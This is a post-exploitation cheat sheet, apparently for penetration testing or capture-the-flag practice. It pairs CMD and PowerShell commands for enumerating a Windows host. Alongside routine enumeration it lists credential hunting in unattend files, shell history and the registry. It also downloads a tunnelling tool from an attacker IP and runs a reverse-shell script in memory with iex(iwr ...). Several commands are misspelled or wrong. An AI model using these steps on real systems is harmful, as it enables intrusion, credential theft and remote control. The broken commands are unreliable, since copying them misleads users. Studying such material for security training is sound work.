Commands

• To understand Powershell working and commands formation do checkout

Powershell

• Commands used in post exploitation for CMD and Powershell variants

C: command for cmd
P: command for powershell

• System information

C: systeminfo
P: Get-ComputerInfo

• Grep

C: findstr
P: Select-String -Pattern "OS:"

• Piping

|
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"

• User name

C: whoami [or] echo %username%
P: $env:UserName  

• Machine name

C: hostname
P: $env:DomainName [or] $env:Computername

• Users

C: net user [or] net user /domain
P: Get-LocalUser

• Information about the user

C: net user dnoscp
P: Get-LocalUser dnoscp

• Groups

C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup

• Get Group members

C: net localgroup Administrators
P: Get-LocalGroupMember Administrators

• Get the network adapters

C: ipconfig [or] ipconfig /all
P: Get-NetAdapter

• Routing Table information

C: route print
P: Get-NetRoute

• Open ports

C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection

• Scheduled Jobs

C: schtasks
P: Get-ScheduledTask

• Running Process

C: tasklist /svc
P: Get-Process

• Starting a service

C: net start Themes
P: Start-Process -FilePath "sort.exe"            

• Installed Drivers

C: drivequery
P: Get-WindowsDriver -Online -All

• Last upated information

C: wmic   qfe get Caption, Description, InstalledOn, HotFixID  
P: (New-Object -com "Microsoft.Update.AutoUpdate"). Results | fl

• Juicy files location

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

• Find files

C: dir /s /p /*.txt /*.xml
P: Get-ChildIten -Path . -Include *.txt,*xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'

• Search for a string in a file

C: findstr /si "password" *.txt,*.xml
P: Get-ChildItem -Recurse . -Filter *.txt,*.xml | Select-String "password"

• Serch registry for passwords

reg query HKLM /f "password" /t REG_SZ /s  
reg query HKCU /f "password" /t REG_SZ /s

• Running Services

C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}

• Information about the running processes

C: sc query "Spooler"
P: Get-Service "Spooler"

• Copy a file

C: copy source_location destination
P: Copy-Item source_location -Destination destination

• Move a file

C: move source_location destination
P: Move-Item source_location -Destination destination

• Download a file

C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe")

• Exeucte powershell scripts directly from the memory

P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)

# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)